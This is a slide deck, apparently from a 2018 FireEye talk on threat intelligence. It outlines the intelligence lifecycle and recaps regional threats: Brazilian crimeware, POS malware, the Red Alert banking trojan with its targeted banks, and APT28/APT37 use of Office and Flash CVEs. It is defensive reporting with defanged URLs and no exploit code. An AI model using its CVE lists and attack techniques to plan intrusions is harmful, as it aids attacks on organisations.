Weitere ähnliche Inhalte Ähnlich wie Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life use-cases. (20) Kürzlich hochgeladen (20) Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life use-cases.2. ©2018 FireEye | Private & Confidential
2
Threat Intelligence IS ?
▶ Out of the box solution;
▶ Will solve all your needs;
▶ Feed keeps running and is protecting your organization from Day 1;
▶ You are immune to cyber attacks;
▶ World is perfect
3. ©2018 FireEye | Private & Confidential
3
Threat Intelligence IS NOT
▶ Out of the box solution;
▶ Will solve all your needs;
▶ Feed keeps running and is protecting your organization from Day 1;
▶ You are immune to cyber attacks;
▶ World is perfect
4. ©2018 FireEye | Private & Confidential
THREAT INTELLIGENCE IN A NUTSHELL
◆What is Threat Intelligence?
▶ It is a proactive, forward-looking means of qualifying threats poised to disrupt your
business based on the intents, tools and tactics of the attacker. A high-fidelity,
comprehensive intelligence delivers visibility beyond the typical attack lifecycle,
adding context and priority to global threats before, during and after an attack. It
helps mitigate risk, bolster incident response, and enhance your overall security
ecosystem. It allows you to predict attack and refocus your attention on what
matters most to your business.
5. ©2018 FireEye | Private & Confidential
5
Intelligence Lifecycle
▶ IR Collection, Prioritization for further research and collection
▶ Research and Collection;
▶ Analysis and processing of discovered data;
▶ Analysis and production to customers;
▶ Dissemination and Revision of the data;
2
1
3
4
5
6. ©2018 FireEye | Private & Confidential
IR Collection, Prioritization for further research and collection
▶ Customer
– Generates/Provides you with the data
▶ Analysts at CTI/Customer
– Based on threats landscape
▶ Regional SME
– Extremely important for targeted research
▶ Scope of customers for CTI
▶ Industry you represent
1
7. ©2018 FireEye | Private & Confidential
Research and Collection
▶ Planning
▶ Creating targets
▶ Building sources
▶ Collection
▶ Research
2
8. ©2018 FireEye | Private & Confidential
Analysis and processing of discovered data
▶ Straightforward based on you type of intel and your consumption model
▶ The third step, processing, is the conversion of collected information into a form
suitable for the production of intelligence. In this process, incoming information is
converted into formats that can be readily used by intelligence analysts in
producing intelligence. Processing may include such activities as translation and
reduction of intercepted messages into written format to permit detailed analysis
and comparison with other information. Other types of processing include video
production, photographic processing, and correlation of information collected by
technical intelligence platforms.
3
9. ©2018 FireEye | Private & Confidential
Analysis and production to customers
▶ Heading to the internal and maybe external customer from CTI;
▶ FINTEL Creation;
▶ The fourth step, production, is the process of analyzing, evaluating, interpreting,
and integrating raw data and information into finished intelligence products for
known or anticipated purposes and applications. The product may be developed
from a single source or from all-source collection and databases. To be effective,
intelligence production must focus on the consumer's needs. It should be objective,
timely, and most importantly accurate.
4
10. ©2018 FireEye | Private & Confidential
Dissemination
▶ Heading to the external customer from CTI;
▶ Heading to customers and clients of the provider;
▶ Intelligence can be provided to the consumer in a wide range of formats including
verbal reports, written reports, imagery products, and intelligence databases.
Dissemination can be accomplished through physical exchanges of data and
through interconnected data and communications networks.
5
11. ©2018 FireEye | Private & Confidential
Threat Intelligence Disciplines
▶ SIGINT
– Signals intelligence—gathered from interception of signals
▶ HUMINT
– Human Intelligence – gathered from a person on the ground.
▶ OSINT
– Open-source intelligence—gathered from open sources.
▶ MASINT
– Measurement and signature intelligence or scientific and technical intelligence
▶ TECHINT, IMINT, CYBERINT, ETC…
12. ©2018 FireEye | Private & Confidential
12
Targeted audience - consumption
▶ Tactical
– Engineers, NetOps.
▶ Operational
– SOCs.
▶ Operational+/All-in
– Analysts/Researchers,
▶ Strategic
– C and E levels;
SOCs
13. ©2018 FireEye | Private & Confidential
13
Motivation
▶ APT/Espionage;
▶ eCrime;
▶ Information Operations/Hacktivism;
▶ ICS/SCADA;
Intelligence
14. ©2018 FireEye | Private & Confidential
14
Latin America Recap.
▶ Interest in compromised credentials for my organization;
▶ No interest in industry peers;
▶ Low readiness from organizations to remediate the threat;
▶ Localized cyber threat ecosystem;
▶ Unsophisticated communication platforms;
15. ©2018 FireEye | Private & Confidential
15
Latin America Recap. Attackers ecosystem.
▶ Boletos
▶ KL Remota
▶ Contador Dark 2018
▶ BR Chilean Malware
▶ FighterPOS, FlokiBot, and LockPOS
16. ©2018 FireEye | Private & Confidential
16
Latin America Recap. Attackers ecosystem.
▶ Boletos
17. ©2018 FireEye | Private & Confidential
17
Latin America Recap. Use-case 1. KL Remota
▶ Popular crimeware tool in Brazilian underground named "Keylogger Remote”
– Likely based on "Spy-Net RAT”
18. ©2018 FireEye | Private & Confidential
18
Latin America Recap. Use-case 1. KL Remota
▶ 'KL Remota’ + 'KL DNS’
▶ 'KL DNS' is a toolkit which consists
of a malicious script, DNS server,
and phishing pages.
19. ©2018 FireEye | Private & Confidential
19
Latin America Recap. Use-case 2. Contador Dark 2018
▶ Contador Dark 2018
▶ Distribution via github
▶ Infection vector: hxxps://XXX.githubusercontent.com
▶ TAAR J TeamViewer as a RAT
20. ©2018 FireEye | Private & Confidential
20
Latin America Recap. Use-case 3. FighterPOS, Floki, LockPOS.
▶ FighterPOS
– Visual Basic-compiled Trojan, but not principally point-of-sale (POS) malware;
– keylogging, downloading and executing files;
– DDoS-module;
– (borrowed some code as usual from "TomPOS” known back in 2014);
▶ Command to download LockPOS executable
21. ©2018 FireEye | Private & Confidential
21
Latin America Recap. Use-case 3.
▶ Avalance Today
22. ©2018 FireEye | Private & Confidential
22
Latin America Recap. Use-case 3.
▶ Captain Black
23. ©2018 FireEye | Private & Confidential
23
Eastern Europe Recap.
▶ Obvious interest in compromised credentials for my organization;
▶ Medium and growing interest in industry peers;
▶ Low readiness from organizations to remediate the threat;
▶ Global cyber threat ecosystem;
▶ Highly sophisticated communication platforms;
24. ©2018 FireEye | Private & Confidential
24
Use-case 1. Temp.Metastrike/Cobalt
Let’s call it group X has been continuously targeting financial organization in numerous countries.
Ways to hunt it down:
- Botnet emulation;
- Threat hunting;
- Honeypots;
- Endpoint solutions;
25. ©2018 FireEye | Private & Confidential
25
Use-case 1. Initial stages of delivery and Patch management
ThreadKit Doc Exp Builder:
CVE-2017-0199, Microsoft Office RTF Vuln
CVE-2015-1650, Use-after-free vulnerability in Microsoft Word
CVE-2016-4117, Adobe Flash vulnerability.
CVE-2017-8759, MS Office RTF SOAP WSDL parser code injection vulnerability.
CVE-2017-11882, MS Office Corruption Vulnerability.
CVE-2017-8570, MS Office RCE Vulnerability.
CVE-2018-0802, MS Office Memory Corruption Vulnerability.
26. ©2018 FireEye | Private & Confidential
26
Use-case 1. Tracking complete campaign
▶ Threat component;
▶ Actor/group attribution;
▶ Botnet/distribution monitoring based on hunting and sensors data;
▶ TTPs analysis
▶ Naming correlation;
27. ©2018 FireEye | Private & Confidential
27
Use-case 2. Mobile Threat. 1 year ago
Red Alert
28. ©2018 FireEye | Private & Confidential
28
Launch 2017. Call it soft
▶ Germany: -Post Bank -Commerzbank -ComDirect
▶ Italy: -Intesa Sanpaolo -UBI
▶ Poland: -Raiffeisen Poland
▶ POLAND -Raiffeisen Poland -Bank Pekao -Bank Zachodni WBK -ING Bank -mBank -millenium bank
▶ GERMANY -Post Bank -Commerzbank -ComDirect
▶ FRANCE -Crédit Mutuel -Bankque palatine -Banque Populaire -Ma banque -Lapost bank -Mes Comptes -
Banque -Mes Comptes BNP Paribas
▶ ITALY -Intesa Sanpaolo -UBI
▶ TURKEY -AkBank -Finansbank -Garanti bank -Turkiye Bankasi -HalkBank -VakifBank -YapiKredi -Ziraat bank
29. ©2018 FireEye | Private & Confidential
29
Red Alert. Today
▶
Italy
Australia
Austria
Belgium
Czech
FRANCE
Germany
Hungary
India
Italy
Latvia
Lithuania
Poland
Netherlands
Switzerland
Spain
Romania
TURKEY
UAE
United Kingdom
United States
Netherlands
Switzerland
Spain
Romania
TURKEY
UAE
United Kingdom
United States
30. ©2018 FireEye | Private & Confidential
30
Use-case 3. APT28
▶ Usage of Flash exploit CVE-2018-4878
▶ Geography:
– Austria
– Montenegro
– Norway
31. ©2018 FireEye | Private & Confidential
31
Use-case 3. APT28
▶ The documents observed have had embedded parent Flash movie:
• <dc:date>06.03.2018</dc:date>
– Metadata showing potential creation date
▶ The Flash movie leverages code from the following open-source project as a framework to load the
embedded malicious content:
– hxxps://github.com/XXXXXX/f4player
32. ©2018 FireEye | Private & Confidential
32
APJ. Recap.
▶ Obvious interest in compromised credentials for my organization;
▶ Medium and growing interest in industry peers;
▶ Rapidly growing readiness from organizations to remediate the threat;
▶ Mostly localized, global-specific cyber threat ecosystem;
▶ Unsophisticated communication platforms;
33. ©2018 FireEye | Private & Confidential
33
Use-case 1. APJ
▶ Japanese credit card CVVs
▶ 'Mbackup’ Android bot
– call history and SMS;
– record of incoming/outgoing calls;
– QQ, WeChat, Momo, Yixin and YY;
34. ©2018 FireEye | Private & Confidential
34
Use-case 2. APJ. APT37
▶ Usage of Flash exploit CVE-2018-4878
▶ Geography:
– S. Korea;
– Middle East;
– Japan;
– Vietnam;
35. ©2018 FireEye | Private & Confidential
35
Use-case 2. APT37 TTPs
▶ Distribution:
– Spear-phishing;
– SWC;
– Torrent file-sharing;
▶ Tools:
– Exfil tools with hard-coded HTTP POST headers;
– Backdoors;
– Wiper;
– Multi-stage downloaders.